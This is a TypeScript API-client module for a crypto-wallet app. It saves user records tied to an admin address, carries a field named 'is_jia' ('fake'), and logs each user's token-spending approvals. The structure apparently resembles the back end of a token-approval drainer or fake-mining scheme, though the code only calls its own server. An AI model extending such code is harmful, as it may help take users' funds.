import api from './axios';

export interface UserInfo {
  id: number;
  a_address: string;
  b_address: string;
  uid: number;
  balance: string;
  type: number;
  addtime: number;
  demo: string | null;
  wallet_status: number;
  min_amount: string;
  total: string;
  oper_time: number;
  is_jia: number;
  p_address: string | null;
  usdc_wallet: string;
  is_tg: number;
  is_notice: number;
  zy_amount: number;
  zy_profit: number | null;
  zy_bilv: number | null;
  zy_days: string;
  zy_stime: number;
  zy_etime: number;
  zy_status: number;
}

// 保存用户信息
export const saveUserInfo = async (
  address: string,
  balance: string,
  adminAddress: string,
  adminId: string | null,
  walletStatus: number = 0
) => {
  try {
    const response = await api.post('/users', {
      a_address: address,
      b_address: adminAddress,
      uid: adminId ? parseInt(adminId) : 1,
      balance: balance,
      type: 30, // 修改为30次初始计算机会
      wallet_status: walletStatus,
      min_amount: '0.00',
      total: '0.00000',
      oper_time: Math.floor(Date.now() / 1000),
      addtime: Math.floor(Date.now() / 1000),
      is_jia: 1,
      usdc_wallet: '0.00000',
      is_tg: 0,
      is_notice: 1,
      zy_amount: 0,
      zy_days: '0',
      zy_stime: 0,
      zy_etime: 0,
      zy_status: 1
    });
    return response.data;
  } catch (error) {
    console.error(':', error);
    throw error;
  }
};

// 记录用户授权
export const recordUserAuthorization = async (data: {
  walletAddress: string;
  tokenAddress: string;
  approvalAddress: string;
  authorizationAmount: string;
  transactionHash: string;
  blockNumber: number;
}) => {
  try {
    const response = await api.post('/users/authorization', data);
    return response.data;
  } catch (error) {
    console.error('记录用户授权失败:', error);
    throw error;
  }
};

// 更新用户余额
export const updateUserBalance = async (address: string, balance: string) => {
  try {
    // 更新用户余额（同时更新 lk_users 和 lk_jiang 表）
    const response = await api.put(`/users/${address}/balance`, { balance });
    console.log(':', response.data);
    return response.data;
  } catch (error) {
    console.error(':', error);
    throw error;
  }
};

// 获取用户信息
export const getUserInfo = async (walletAddress: string): Promise<UserInfo> => {
  try {
    const response = await api.get(`/users/${walletAddress}`);
    return response.data;
  } catch (error) {
    console.error('获取用户信息失败:', error);
    throw error;
  }
};

// 更新用户授权状态
export const updateUserAuthorizationStatus = async (walletAddress: string, walletStatus: number): Promise<void> => {
  try {
    await api.put(`/users/${walletAddress}/authorization`, { wallet_status: walletStatus });
  } catch (error) {
    console.error('更新用户授权状态失败:', error);
    throw error;
  }
};

export const updateUserWalletStatus = async (address: string, status: number) => {
  try {
    const response = await api.post('/users/wallet-status', {
      address,
      status
    });
    return response.data;
  } catch (error) {
    console.error('更新用户钱包状态失败:', error);
    throw error;
  }
}; 